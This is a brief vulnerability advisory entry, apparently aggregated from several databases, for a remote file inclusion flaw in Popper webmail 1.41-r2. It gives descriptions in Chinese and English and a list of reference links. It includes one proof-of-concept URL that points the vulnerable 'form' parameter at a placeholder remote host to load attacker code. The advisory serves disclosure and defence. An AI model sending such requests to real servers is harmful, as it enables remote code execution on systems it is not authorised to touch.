https://www.exploit-db.com/exploits/25788
https://www.securityfocus.com/bid/89872
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-064

Popper1.41-r2及早期版本的childwindow.inc.php脚本存在PHP远程文件包含漏洞，远程攻击者可借助form参数执行任意PHP代码。

source: http://www.securityfocus.com/bid/13851/info

Popper is affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/popper/childwindow.inc.php?form=http://www.example.com/test

Popper Popper 1.41 R2

来源:OSVDB
名称:17085
链接:http://www.osvdb.org/17085
来源:SECTRACK
名称:1014116
链接:http://securitytracker.com/id?1014116
来源:MISC
链接:http://security.lss.hr/en/index.php?page=details&ID;=LSS-2005-06-07
来源:SECUNIA
名称:15584
链接:http://secunia.com/advisories/15584
来源:FULLDISC
名称:20050605Re:LSS.hrfalsepositives.(correction)
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m;=111801389729155&w;=2
来源:FULLDISC
名称:20050606Popperwebmailremotecodeexecutionvulnerability-advisoryfix
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034425.html
来源:FULLDISC
名称:20050604LSS.hrfalsepositives.
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034408.html